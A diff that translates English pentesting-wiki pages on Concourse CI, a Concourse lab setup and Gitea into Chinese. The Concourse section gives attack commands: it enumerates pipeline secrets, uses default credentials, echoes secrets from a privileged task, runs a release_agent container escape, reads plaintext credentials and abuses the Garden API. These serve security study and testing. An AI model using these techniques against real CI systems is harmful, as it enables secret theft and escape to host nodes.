-Moreover, the _**secret-path**_ and _**secret-field**_ may be surrounded by double quotes `"..."` if they **contain special characters** like `.` and `:`. For instance, `((source:"my.secret"."field:1"))` will set the _secret-path_ to `my.secret` and the _secret-field_ to `field:1`.
+在 YAML 配置中,您可以使用语法 `((_source-name_:_secret-path_._secret-field_))` 配置值。\
+[来自文档:](https://concourse-ci.org/vars.html#var-syntax) **source-name 是可选的**,如果省略,将使用 [集群范围的凭证管理器](https://concourse-ci.org/vars.html#cluster-wide-credential-manager),或者可以 [静态提供值](https://concourse-ci.org/vars.html#static-vars)。\
+**可选的 \_secret-field**\_ 指定要读取的获取凭证上的字段。如果省略,凭证管理器可以选择从获取的凭证中读取“默认字段”,如果该字段存在。\
+此外,_**secret-path**_ 和 _**secret-field**_ 如果 **包含特殊字符**(如 `.` 和 `:`),可以用双引号 `"..."` 括起来。例如,`((source:"my.secret"."field:1"))` 将把 _secret-path_ 设置为 `my.secret`,将 _secret-field_ 设置为 `field:1`。
-#### Static Vars
-
-Static vars can be specified in **tasks steps**:
+#### 静态变量
+静态变量可以在 **任务步骤** 中指定:
```yaml
- task: unit-1.13
- file: booklit/ci/unit.yml
- vars: { tag: 1.13 }
+file: booklit/ci/unit.yml
+vars: { tag: 1.13 }
```
-
Or using the following `fly` **arguments**:
-- `-v` or `--var` `NAME=VALUE` sets the string `VALUE` as the value for the var `NAME`.
-- `-y` or `--yaml-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the var `NAME`.
-- `-i` or `--instance-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the instance var `NAME`. See [Grouping Pipelines](https://concourse-ci.org/instanced-pipelines.html) to learn more about instance vars.
-- `-l` or `--load-vars-from` `FILE` loads `FILE`, a YAML document containing mapping var names to values, and sets them all.
+- `-v` or `--var` `NAME=VALUE` 将字符串 `VALUE` 设置为变量 `NAME` 的值。
+- `-y` or `--yaml-var` `NAME=VALUE` 将 `VALUE` 解析为 YAML,并将其设置为变量 `NAME` 的值。
+- `-i` or `--instance-var` `NAME=VALUE` 将 `VALUE` 解析为 YAML,并将其设置为实例变量 `NAME` 的值。有关实例变量的更多信息,请参见 [Grouping Pipelines](https://concourse-ci.org/instanced-pipelines.html)。
+- `-l` or `--load-vars-from` `FILE` 加载 `FILE`,这是一个包含变量名称与值映射的 YAML 文档,并设置所有变量。
#### Credential Management
-There are different ways a **Credential Manager can be specified** in a pipeline, read how in [https://concourse-ci.org/creds.html](https://concourse-ci.org/creds.html).\
-Moreover, Concourse supports different credential managers:
+在管道中可以通过不同方式指定 **Credential Manager**,请阅读 [https://concourse-ci.org/creds.html](https://concourse-ci.org/creds.html)。\
+此外,Concourse 支持不同的凭证管理器:
- [The Vault credential manager](https://concourse-ci.org/vault-credential-manager.html)
- [The CredHub credential manager](https://concourse-ci.org/credhub-credential-manager.html)
@@ -59,160 +57,151 @@ Moreover, Concourse supports different credential managers:
- [Retrying failed fetches](https://concourse-ci.org/creds-retry-logic.html)
> [!CAUTION]
-> Note that if you have some kind of **write access to Concourse** you can create jobs to **exfiltrate those secrets** as Concourse needs to be able to access them.
+> 请注意,如果您对 Concourse 有某种 **写入访问权限**,您可以创建作业来 **提取这些秘密**,因为 Concourse 需要能够访问它们。
### Concourse Enumeration
-In order to enumerate a concourse environment you first need to **gather valid credentials** or to find an **authenticated token** probably in a `.flyrc` config file.
+为了枚举一个 concourse 环境,您首先需要 **收集有效凭证** 或找到一个 **认证令牌**,可能在 `.flyrc` 配置文件中。
#### Login and Current User enum
-- To login you need to know the **endpoint**, the **team name** (default is `main`) and a **team the user belongs to**:
- - `fly --target example login --team-name my-team --concourse-url https://ci.example.com [--insecure] [--client-cert=./path --client-key=./path]`
-- Get configured **targets**:
- - `fly targets`
-- Get if the configured **target connection** is still **valid**:
- - `fly -t status`
-- Get **role** of the user against the indicated target:
- - `fly -t userinfo`
+- 要登录,您需要知道 **端点**、**团队名称**(默认是 `main`)和 **用户所属的团队**:
+- `fly --target example login --team-name my-team --concourse-url https://ci.example.com [--insecure] [--client-cert=./path --client-key=./path]`
+- 获取配置的 **targets**:
+- `fly targets`
+- 获取配置的 **target 连接**是否仍然 **有效**:
+- `fly -t status`
+- 获取用户在指定目标下的 **角色**:
+- `fly -t userinfo`
> [!NOTE]
-> Note that the **API token** is **saved** in `$HOME/.flyrc` by default, you looting a machines you could find there the credentials.
+> 请注意,**API token** 默认保存在 `$HOME/.flyrc` 中,您在盗取机器时可以在那里找到凭证。
#### Teams & Users
-- Get a list of the Teams
- - `fly -t teams`
-- Get roles inside team
- - `fly -t get-team -n `
-- Get a list of users
- - `fly -t active-users`
+- 获取团队列表
+- `fly -t teams`
+- 获取团队内的角色
+- `fly -t get-team -n `
+- 获取用户列表
+- `fly -t active-users`
#### Pipelines
-- **List** pipelines:
- - `fly -t pipelines -a`
-- **Get** pipeline yaml (**sensitive information** might be found in the definition):
- - `fly -t get-pipeline -p `
-- Get all pipeline **config declared vars**
- - `for pipename in $(fly -t pipelines | grep -Ev "^id" | awk '{print $2}'); do echo $pipename; fly -t get-pipeline -p $pipename -j | grep -Eo '"vars":[^}]+'; done`
-- Get all the **pipelines secret names used** (if you can create/modify a job or hijack a container you could exfiltrate them):
-
+- **列出** 管道:
+- `fly -t pipelines -a`
+- **获取** 管道 yaml(**敏感信息**可能在定义中找到):
+- `fly -t get-pipeline -p `
+- 获取所有管道 **配置声明的变量**
+- `for pipename in $(fly -t pipelines | grep -Ev "^id" | awk '{print $2}'); do echo $pipename; fly -t get-pipeline -p $pipename -j | grep -Eo '"vars":[^}]+'; done`
+- 获取所有 **管道使用的秘密名称**(如果您可以创建/修改作业或劫持容器,您可以提取它们):
```bash
rm /tmp/secrets.txt;
for pipename in $(fly -t onelogin pipelines | grep -Ev "^id" | awk '{print $2}'); do
- echo $pipename;
- fly -t onelogin get-pipeline -p $pipename | grep -Eo '\(\(.*\)\)' | sort | uniq | tee -a /tmp/secrets.txt;
- echo "";
+echo $pipename;
+fly -t onelogin get-pipeline -p $pipename | grep -Eo '\(\(.*\)\)' | sort | uniq | tee -a /tmp/secrets.txt;
+echo "";
done
echo ""
echo "ALL SECRETS"
cat /tmp/secrets.txt | sort | uniq
rm /tmp/secrets.txt
```
+#### 容器与工作者
-#### Containers & Workers
+- 列出 **workers**:
+- `fly -t workers`
+- 列出 **containers**:
+- `fly -t containers`
+- 列出 **builds** (查看正在运行的内容):
+- `fly -t builds`
-- List **workers**:
- - `fly -t workers`
-- List **containers**:
- - `fly -t containers`
-- List **builds** (to see what is running):
- - `fly -t builds`
+### Concourse 攻击
-### Concourse Attacks
-
-#### Credentials Brute-Force
+#### 凭证暴力破解
- admin:admin
- test:test
-#### Secrets and params enumeration
+#### 秘密和参数枚举
-In the previous section we saw how you can **get all the secrets names and vars** used by the pipeline. The **vars might contain sensitive info** and the name of the **secrets will be useful later to try to steal** them.
+在上一节中,我们看到如何 **获取管道使用的所有秘密名称和变量**。**变量可能包含敏感信息**,而 **秘密的名称在稍后尝试窃取它们时将非常有用**。
-#### Session inside running or recently run container
-
-If you have enough privileges (**member role or more**) you will be able to **list pipelines and roles** and just get a **session inside** the `/` **container** using:
+#### 在运行或最近运行的容器内会话
+如果您拥有足够的权限(**成员角色或更高**),您将能够 **列出管道和角色**,并使用以下命令直接进入 `/` **容器**:
```bash
fly -t tutorial intercept --job pipeline-name/job-name
fly -t tutorial intercept # To be presented a prompt with all the options
```
+有了这些权限,您可能能够:
-With these permissions you might be able to:
+- **窃取** **容器** 内部的秘密
+- 尝试 **逃逸** 到节点
+- 枚举/滥用 **云元数据** 端点(从 pod 和节点,如果可能的话)
-- **Steal the secrets** inside the **container**
-- Try to **escape** to the node
-- Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node, if possible)
-
-#### Pipeline Creation/Modification
-
-If you have enough privileges (**member role or more**) you will be able to **create/modify new pipelines.** Check this example:
+#### 管道创建/修改
+如果您拥有足够的权限(**成员角色或更高**),您将能够 **创建/修改新管道。** 请查看这个例子:
```yaml
jobs:
- - name: simple
- plan:
- - task: simple-task
- privileged: true
- config:
- # Tells Concourse which type of worker this task should run on
- platform: linux
- image_resource:
- type: registry-image
- source:
- repository: busybox # images are pulled from docker hub by default
- run:
- path: sh
- args:
- - -cx
- - |
- echo "$SUPER_SECRET"
- sleep 1000
- params:
- SUPER_SECRET: ((super.secret))
+- name: simple
+plan:
+- task: simple-task
+privileged: true
+config:
+# Tells Concourse which type of worker this task should run on
+platform: linux
+image_resource:
+type: registry-image
+source:
+repository: busybox # images are pulled from docker hub by default
+run:
+path: sh
+args:
+- -cx
+- |
+echo "$SUPER_SECRET"
+sleep 1000
+params:
+SUPER_SECRET: ((super.secret))
```
+通过**修改/创建**新管道,您将能够:
-With the **modification/creation** of a new pipeline you will be able to:
+- **窃取** **秘密**(通过回显它们或进入容器并运行 `env`)
+- **逃逸**到**节点**(通过给予您足够的权限 - `privileged: true`)
+- 枚举/滥用**云元数据**端点(从 pod 和节点)
+- **删除**创建的管道
-- **Steal** the **secrets** (via echoing them out or getting inside the container and running `env`)
-- **Escape** to the **node** (by giving you enough privileges - `privileged: true`)
-- Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node)
-- **Delete** created pipeline
-
-#### Execute Custom Task
-
-This is similar to the previous method but instead of modifying/creating a whole new pipeline you can **just execute a custom task** (which will probably be much more **stealthier**):
+#### 执行自定义任务
+这与之前的方法类似,但您可以**仅执行自定义任务**(这可能会更加**隐蔽**):
```yaml
# For more task_config options check https://concourse-ci.org/tasks.html
platform: linux
image_resource:
- type: registry-image
- source:
- repository: ubuntu
+type: registry-image
+source:
+repository: ubuntu
run:
- path: sh
- args:
- - -cx
- - |
- env
- sleep 1000
+path: sh
+args:
+- -cx
+- |
+env
+sleep 1000
params:
- SUPER_SECRET: ((super.secret))
+SUPER_SECRET: ((super.secret))
```
```bash
fly -t tutorial execute --privileged --config task_config.yml
```
+#### 从特权任务逃逸到节点
-#### Escaping to the node from privileged task
-
-In the previous sections we saw how to **execute a privileged task with concourse**. This won't give the container exactly the same access as the privileged flag in a docker container. For example, you won't see the node filesystem device in /dev, so the escape could be more "complex".
-
-In the following PoC we are going to use the release_agent to escape with some small modifications:
+在前面的部分中,我们看到如何**使用concourse执行特权任务**。这不会给容器提供与docker容器中的特权标志完全相同的访问权限。例如,您不会在/dev中看到节点文件系统设备,因此逃逸可能会更“复杂”。
+在以下PoC中,我们将使用release_agent进行逃逸,并进行一些小的修改:
```bash
# Mounts the RDMA cgroup controller and create a child cgroup
# If you're following along and get "mount: /tmp/cgrp: special device cgroup does not exist"
@@ -270,14 +259,12 @@ sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# Reads the output
cat /output
```
-
> [!WARNING]
-> As you might have noticed this is just a [**regular release_agent escape**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/concourse-security/broken-reference/README.md) just modifying the path of the cmd in the node
+> 正如您可能注意到的,这只是一个 [**常规 release_agent 逃逸**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/concourse-security/broken-reference/README.md),只是修改了节点中 cmd 的路径
-#### Escaping to the node from a Worker container
-
-A regular release_agent escape with a minor modification is enough for this:
+#### 从 Worker 容器逃逸到节点
+一个常规的 release_agent 逃逸,稍作修改就足够了:
```bash
mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
@@ -304,13 +291,11 @@ sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# Reads the output
cat /output
```
+#### 从Web容器逃逸到节点
-#### Escaping to the node from the Web container
-
-Even if the web container has some defenses disabled it's **not running as a common privileged container** (for example, you **cannot** **mount** and the **capabilities** are very **limited**, so all the easy ways to escape from the container are useless).
-
-However, it stores **local credentials in clear text**:
+即使Web容器禁用了某些防御,它也**不是以普通特权容器的身份运行**(例如,您**无法** **挂载**,并且**能力**非常**有限**,因此所有简单的逃逸容器的方法都是无效的)。
+然而,它以明文形式存储**本地凭据**:
```bash
cat /concourse-auth/local-users
test:test
@@ -319,11 +304,9 @@ env | grep -i local_user
CONCOURSE_MAIN_TEAM_LOCAL_USER=test
CONCOURSE_ADD_LOCAL_USER=test:test
```
+您可以使用该凭据**登录到网络服务器**并**创建一个特权容器并逃逸到节点**。
-You cloud use that credentials to **login against the web server** and **create a privileged container and escape to the node**.
-
-In the environment you can also find information to **access the postgresql** instance that concourse uses (address, **username**, **password** and database among other info):
-
+在环境中,您还可以找到信息以**访问concourse使用的postgresql**实例(地址、**用户名**、**密码**和数据库等信息):
```bash
env | grep -i postg
CONCOURSE_RELEASE_POSTGRESQL_PORT_5432_TCP_ADDR=10.107.191.238
@@ -344,39 +327,35 @@ select * from refresh_token;
select * from teams; #Change the permissions of the users in the teams
select * from users;
```
-
-#### Abusing Garden Service - Not a real Attack
+#### 滥用 Garden 服务 - 不是一个真正的攻击
> [!WARNING]
-> This are just some interesting notes about the service, but because it's only listening on localhost, this notes won't present any impact we haven't already exploited before
+> 这些只是关于该服务的一些有趣的笔记,但由于它仅在本地主机上监听,这些笔记不会带来我们尚未利用过的任何影响
-By default each concourse worker will be running a [**Garden**](https://github.com/cloudfoundry/garden) service in port 7777. This service is used by the Web master to indicate the worker **what he needs to execute** (download the image and run each task). This sound pretty good for an attacker, but there are some nice protections:
+默认情况下,每个 concourse worker 将在 7777 端口运行一个 [**Garden**](https://github.com/cloudfoundry/garden) 服务。该服务由 Web 主机用于指示 worker **需要执行的内容**(下载镜像并运行每个任务)。这对攻击者来说听起来不错,但有一些很好的保护措施:
-- It's just **exposed locally** (127..0.0.1) and I think when the worker authenticates agains the Web with the special SSH service, a tunnel is created so the web server can **talk to each Garden service** inside each worker.
-- The web server is **monitoring the running containers every few seconds**, and **unexpected** containers are **deleted**. So if you want to **run a custom container** you need to **tamper** with the **communication** between the web server and the garden service.
-
-Concourse workers run with high container privileges:
+- 它仅**在本地暴露**(127..0.0.1),我认为当 worker 通过特殊的 SSH 服务对 Web 进行身份验证时,会创建一个隧道,以便 Web 服务器可以**与每个 worker 内的 Garden 服务进行通信**。
+- Web 服务器**每隔几秒监控运行的容器**,并且**意外的**容器会被**删除**。因此,如果您想要**运行自定义容器**,您需要**篡改** Web 服务器与 Garden 服务之间的**通信**。
+Concourse workers 以高容器权限运行:
```
Container Runtime: docker
Has Namespaces:
- pid: true
- user: false
+pid: true
+user: false
AppArmor Profile: kernel
Capabilities:
- BOUNDING -> chown dac_override dac_read_search fowner fsetid kill setgid setuid setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw ipc_lock ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct sys_admin sys_boot sys_nice sys_resource sys_time sys_tty_config mknod lease audit_write audit_control setfcap mac_override mac_admin syslog wake_alarm block_suspend audit_read
+BOUNDING -> chown dac_override dac_read_search fowner fsetid kill setgid setuid setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw ipc_lock ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct sys_admin sys_boot sys_nice sys_resource sys_time sys_tty_config mknod lease audit_write audit_control setfcap mac_override mac_admin syslog wake_alarm block_suspend audit_read
Seccomp: disabled
```
-
-However, techniques like **mounting** the /dev device of the node or release_agent **won't work** (as the real device with the filesystem of the node isn't accesible, only a virtual one). We cannot access processes of the node, so escaping from the node without kernel exploits get complicated.
+然而,像**挂载**节点的 /dev 设备或 release_agent 的技术**不会工作**(因为节点的真实设备与文件系统不可访问,只有一个虚拟设备)。我们无法访问节点的进程,因此在没有内核漏洞的情况下逃离节点变得复杂。
> [!NOTE]
-> In the previous section we saw how to escape from a privileged container, so if we can **execute** commands in a **privileged container** created by the **current** **worker**, we could **escape to the node**.
+> 在上一节中,我们看到如何从特权容器中逃脱,因此如果我们可以在**当前** **工作者**创建的**特权容器**中**执行**命令,我们就可以**逃离到节点**。
-Note that playing with concourse I noted that when a new container is spawned to run something, the container processes are accessible from the worker container, so it's like a container creating a new container inside of it.
-
-**Getting inside a running privileged container**
+请注意,在玩弄 concourse 时,我注意到当一个新容器被生成以运行某些东西时,容器进程可以从工作者容器访问,因此就像一个容器在内部创建一个新容器。
+**进入一个正在运行的特权容器**
```bash
# Get current container
curl 127.0.0.1:7777/containers
@@ -389,30 +368,26 @@ curl 127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/properties
# Execute a new process inside a container
## In this case "sleep 20000" will be executed in the container with handler ac793559-7f53-4efc-6591-0171a0391e53
wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \
- --header='Content-Type:application/json' \
- 'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'
+--header='Content-Type:application/json' \
+'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'
# OR instead of doing all of that, you could just get into the ns of the process of the privileged container
nsenter --target 76011 --mount --uts --ipc --net --pid -- sh
```
+**创建一个新的特权容器**
-**Creating a new privileged container**
-
-You can very easily create a new container (just run a random UID) and execute something on it:
-
+您可以非常轻松地创建一个新容器(只需运行一个随机 UID)并在其上执行某些操作:
```bash
curl -X POST http://127.0.0.1:7777/containers \
- -H 'Content-Type: application/json' \
- -d '{"handle":"123ae8fc-47ed-4eab-6b2e-123458880690","rootfs":"raw:///concourse-work-dir/volumes/live/ec172ffd-31b8-419c-4ab6-89504de17196/volume","image":{},"bind_mounts":[{"src_path":"/concourse-work-dir/volumes/live/9f367605-c9f0-405b-7756-9c113eba11f1/volume","dst_path":"/scratch","mode":1}],"properties":{"user":""},"env":["BUILD_ID=28","BUILD_NAME=24","BUILD_TEAM_ID=1","BUILD_TEAM_NAME=main","ATC_EXTERNAL_URL=http://127.0.0.1:8080"],"limits":{"bandwidth_limits":{},"cpu_limits":{},"disk_limits":{},"memory_limits":{},"pid_limits":{}}}'
+-H 'Content-Type: application/json' \
+-d '{"handle":"123ae8fc-47ed-4eab-6b2e-123458880690","rootfs":"raw:///concourse-work-dir/volumes/live/ec172ffd-31b8-419c-4ab6-89504de17196/volume","image":{},"bind_mounts":[{"src_path":"/concourse-work-dir/volumes/live/9f367605-c9f0-405b-7756-9c113eba11f1/volume","dst_path":"/scratch","mode":1}],"properties":{"user":""},"env":["BUILD_ID=28","BUILD_NAME=24","BUILD_TEAM_ID=1","BUILD_TEAM_NAME=main","ATC_EXTERNAL_URL=http://127.0.0.1:8080"],"limits":{"bandwidth_limits":{},"cpu_limits":{},"disk_limits":{},"memory_limits":{},"pid_limits":{}}}'
# Wget will be stucked there as long as the process is being executed
wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \
- --header='Content-Type:application/json' \
- 'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'
+--header='Content-Type:application/json' \
+'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'
```
-
-However, the web server is checking every few seconds the containers that are running, and if an unexpected one is discovered, it will be deleted. As the communication is occurring in HTTP, you could tamper the communication to avoid the deletion of unexpected containers:
-
+然而,网络服务器每隔几秒钟检查正在运行的容器,如果发现意外的容器,它将被删除。由于通信是在HTTP中进行的,您可以篡改通信以避免意外容器的删除:
```
GET /containers HTTP/1.1.
Host: 127.0.0.1:7777.
@@ -434,13 +409,8 @@ Host: 127.0.0.1:7777.
User-Agent: Go-http-client/1.1.
Accept-Encoding: gzip.
```
-
-## References
+## 参考
- https://concourse-ci.org/vars.html
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/concourse-security/concourse-lab-creation.md b/src/pentesting-ci-cd/concourse-security/concourse-lab-creation.md
index 0cc6363a7..bef222449 100644
--- a/src/pentesting-ci-cd/concourse-security/concourse-lab-creation.md
+++ b/src/pentesting-ci-cd/concourse-security/concourse-lab-creation.md
@@ -2,25 +2,22 @@
{{#include ../../banners/hacktricks-training.md}}
-## Testing Environment
+## 测试环境
-### Running Concourse
+### 运行 Concourse
-#### With Docker-Compose
-
-This docker-compose file simplifies the installation to do some tests with concourse:
+#### 使用 Docker-Compose
+这个 docker-compose 文件简化了安装,以便进行一些与 concourse 的测试:
```bash
wget https://raw.githubusercontent.com/starkandwayne/concourse-tutorial/master/docker-compose.yml
docker-compose up -d
```
+您可以从网络上下载适用于您的操作系统的命令行 `fly`,地址为 `127.0.0.1:8080`
-You can download the command line `fly` for your OS from the web in `127.0.0.1:8080`
-
-#### With Kubernetes (Recommended)
-
-You can easily deploy concourse in **Kubernetes** (in **minikube** for example) using the helm-chart: [**concourse-chart**](https://github.com/concourse/concourse-chart).
+#### 使用 Kubernetes(推荐)
+您可以使用 helm-chart 轻松在 **Kubernetes**(例如 **minikube**)中部署 concourse: [**concourse-chart**](https://github.com/concourse/concourse-chart)。
```bash
brew install helm
helm repo add concourse https://concourse-charts.storage.googleapis.com/
@@ -31,94 +28,90 @@ helm install concourse-release concourse/concourse
# If you need to delete it
helm delete concourse-release
```
-
-After generating the concourse env, you could generate a secret and give a access to the SA running in concourse web to access K8s secrets:
-
+在生成 concourse 环境后,您可以生成一个密钥并授予在 concourse web 中运行的 SA 访问 K8s 密钥的权限:
```yaml
echo 'apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
- name: read-secrets
+name: read-secrets
rules:
- apiGroups: [""]
- resources: ["secrets"]
- verbs: ["get"]
+resources: ["secrets"]
+verbs: ["get"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
- name: read-secrets-concourse
+name: read-secrets-concourse
roleRef:
- apiGroup: rbac.authorization.k8s.io
- kind: ClusterRole
- name: read-secrets
+apiGroup: rbac.authorization.k8s.io
+kind: ClusterRole
+name: read-secrets
subjects:
- kind: ServiceAccount
- name: concourse-release-web
- namespace: default
+name: concourse-release-web
+namespace: default
---
apiVersion: v1
kind: Secret
metadata:
- name: super
- namespace: concourse-release-main
+name: super
+namespace: concourse-release-main
type: Opaque
data:
- secret: MWYyZDFlMmU2N2Rm
+secret: MWYyZDFlMmU2N2Rm
' | kubectl apply -f -
```
+### 创建管道
-### Create Pipeline
+管道由一系列 [Jobs](https://concourse-ci.org/jobs.html) 组成,其中包含一个有序的 [Steps](https://concourse-ci.org/steps.html) 列表。
-A pipeline is made of a list of [Jobs](https://concourse-ci.org/jobs.html) which contains an ordered list of [Steps](https://concourse-ci.org/steps.html).
+### 步骤
-### Steps
+可以使用几种不同类型的步骤:
-Several different type of steps can be used:
+- **the** [**`task` step**](https://concourse-ci.org/task-step.html) **运行一个** [**task**](https://concourse-ci.org/tasks.html)
+- the [`get` step](https://concourse-ci.org/get-step.html) 获取一个 [resource](https://concourse-ci.org/resources.html)
+- the [`put` step](https://concourse-ci.org/put-step.html) 更新一个 [resource](https://concourse-ci.org/resources.html)
+- the [`set_pipeline` step](https://concourse-ci.org/set-pipeline-step.html) 配置一个 [pipeline](https://concourse-ci.org/pipelines.html)
+- the [`load_var` step](https://concourse-ci.org/load-var-step.html) 将一个值加载到 [local var](https://concourse-ci.org/vars.html#local-vars) 中
+- the [`in_parallel` step](https://concourse-ci.org/in-parallel-step.html) 并行运行步骤
+- the [`do` step](https://concourse-ci.org/do-step.html) 顺序运行步骤
+- the [`across` step modifier](https://concourse-ci.org/across-step.html#schema.across) 多次运行一个步骤;每种变量值组合运行一次
+- the [`try` step](https://concourse-ci.org/try-step.html) 尝试运行一个步骤,即使步骤失败也会成功
-- **the** [**`task` step**](https://concourse-ci.org/task-step.html) **runs a** [**task**](https://concourse-ci.org/tasks.html)
-- the [`get` step](https://concourse-ci.org/get-step.html) fetches a [resource](https://concourse-ci.org/resources.html)
-- the [`put` step](https://concourse-ci.org/put-step.html) updates a [resource](https://concourse-ci.org/resources.html)
-- the [`set_pipeline` step](https://concourse-ci.org/set-pipeline-step.html) configures a [pipeline](https://concourse-ci.org/pipelines.html)
-- the [`load_var` step](https://concourse-ci.org/load-var-step.html) loads a value into a [local var](https://concourse-ci.org/vars.html#local-vars)
-- the [`in_parallel` step](https://concourse-ci.org/in-parallel-step.html) runs steps in parallel
-- the [`do` step](https://concourse-ci.org/do-step.html) runs steps in sequence
-- the [`across` step modifier](https://concourse-ci.org/across-step.html#schema.across) runs a step multiple times; once for each combination of variable values
-- the [`try` step](https://concourse-ci.org/try-step.html) attempts to run a step and succeeds even if the step fails
+每个 [step](https://concourse-ci.org/steps.html) 在 [job plan](https://concourse-ci.org/jobs.html#schema.job.plan) 中在其 **自己的容器** 中运行。您可以在容器内运行任何您想要的内容 _(即运行我的测试,运行这个 bash 脚本,构建这个镜像等)_。因此,如果您有一个包含五个步骤的作业,Concourse 将为每个步骤创建五个容器。
-Each [step](https://concourse-ci.org/steps.html) in a [job plan](https://concourse-ci.org/jobs.html#schema.job.plan) runs in its **own container**. You can run anything you want inside the container _(i.e. run my tests, run this bash script, build this image, etc.)_. So if you have a job with five steps Concourse will create five containers, one for each step.
-
-Therefore, it's possible to indicate the type of container each step needs to be run in.
-
-### Simple Pipeline Example
+因此,可以指示每个步骤需要运行的容器类型。
+### 简单管道示例
```yaml
jobs:
- - name: simple
- plan:
- - task: simple-task
- privileged: true
- config:
- # Tells Concourse which type of worker this task should run on
- platform: linux
- image_resource:
- type: registry-image
- source:
- repository: busybox # images are pulled from docker hub by default
- run:
- path: sh
- args:
- - -cx
- - |
- sleep 1000
- echo "$SUPER_SECRET"
- params:
- SUPER_SECRET: ((super.secret))
+- name: simple
+plan:
+- task: simple-task
+privileged: true
+config:
+# Tells Concourse which type of worker this task should run on
+platform: linux
+image_resource:
+type: registry-image
+source:
+repository: busybox # images are pulled from docker hub by default
+run:
+path: sh
+args:
+- -cx
+- |
+sleep 1000
+echo "$SUPER_SECRET"
+params:
+SUPER_SECRET: ((super.secret))
```
```bash
@@ -130,26 +123,21 @@ fly -t tutorial trigger-job --job pipe-name/simple --watch
# From another console
fly -t tutorial intercept --job pipe-name/simple
```
+检查 **127.0.0.1:8080** 以查看管道流程。
-Check **127.0.0.1:8080** to see the pipeline flow.
+### 带有输出/输入管道的 Bash 脚本
-### Bash script with output/input pipeline
+可以 **将一个任务的结果保存到文件中** 并指明它是一个输出,然后将下一个任务的输入指明为上一个任务的输出。Concourse 所做的是 **在新任务中挂载上一个任务的目录,以便您可以访问上一个任务创建的文件**。
-It's possible to **save the results of one task in a file** and indicate that it's an output and then indicate the input of the next task as the output of the previous task. What concourse does is to **mount the directory of the previous task in the new task where you can access the files created by the previous task**.
+### 触发器
-### Triggers
+您不需要每次手动触发作业,您还可以编程使其每次运行时自动触发:
-You don't need to trigger the jobs manually every-time you need to run them, you can also program them to be run every-time:
+- 一段时间过去:[时间资源](https://github.com/concourse/time-resource/)
+- 在主分支的新提交时:[Git 资源](https://github.com/concourse/git-resource)
+- 新的 PR:[Github-PR 资源](https://github.com/telia-oss/github-pr-resource)
+- 获取或推送您应用的最新镜像:[Registry-image 资源](https://github.com/concourse/registry-image-resource/)
-- Some time passes: [Time resource](https://github.com/concourse/time-resource/)
-- On new commits to the main branch: [Git resource](https://github.com/concourse/git-resource)
-- New PR's: [Github-PR resource](https://github.com/telia-oss/github-pr-resource)
-- Fetch or push the latest image of your app: [Registry-image resource](https://github.com/concourse/registry-image-resource/)
-
-Check a YAML pipeline example that triggers on new commits to master in [https://concourse-ci.org/tutorial-resources.html](https://concourse-ci.org/tutorial-resources.html)
+查看一个在主分支新提交时触发的 YAML 管道示例,链接在 [https://concourse-ci.org/tutorial-resources.html](https://concourse-ci.org/tutorial-resources.html)
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/gitea-security/README.md b/src/pentesting-ci-cd/gitea-security/README.md
index bf4f6485a..dbcf3ceeb 100644
--- a/src/pentesting-ci-cd/gitea-security/README.md
+++ b/src/pentesting-ci-cd/gitea-security/README.md
@@ -1,142 +1,130 @@
-# Gitea Security
+# Gitea 安全
{{#include ../../banners/hacktricks-training.md}}
-## What is Gitea
+## 什么是 Gitea
-**Gitea** is a **self-hosted community managed lightweight code hosting** solution written in Go.
+**Gitea** 是一个 **自托管的社区管理轻量级代码托管** 解决方案,使用 Go 编写。
.png>)
-### Basic Information
+### 基本信息
{{#ref}}
basic-gitea-information.md
{{#endref}}
-## Lab
-
-To run a Gitea instance locally you can just run a docker container:
+## 实验室
+要在本地运行 Gitea 实例,您只需运行一个 docker 容器:
```bash
docker run -p 3000:3000 gitea/gitea
```
+连接到端口 3000 以访问网页。
-Connect to port 3000 to access the web page.
-
-You could also run it with kubernetes:
-
+您也可以使用 kubernetes 运行它:
```
helm repo add gitea-charts https://dl.gitea.io/charts/
helm install gitea gitea-charts/gitea
```
+## 未经身份验证的枚举
-## Unauthenticated Enumeration
+- 公共仓库: [http://localhost:3000/explore/repos](http://localhost:3000/explore/repos)
+- 注册用户: [http://localhost:3000/explore/users](http://localhost:3000/explore/users)
+- 注册组织: [http://localhost:3000/explore/organizations](http://localhost:3000/explore/organizations)
-- Public repos: [http://localhost:3000/explore/repos](http://localhost:3000/explore/repos)
-- Registered users: [http://localhost:3000/explore/users](http://localhost:3000/explore/users)
-- Registered Organizations: [http://localhost:3000/explore/organizations](http://localhost:3000/explore/organizations)
+请注意,**默认情况下 Gitea 允许新用户注册**。这不会给新用户提供对其他组织/用户仓库的特别有趣的访问权限,但**登录用户**可能能够**查看更多的仓库或组织**。
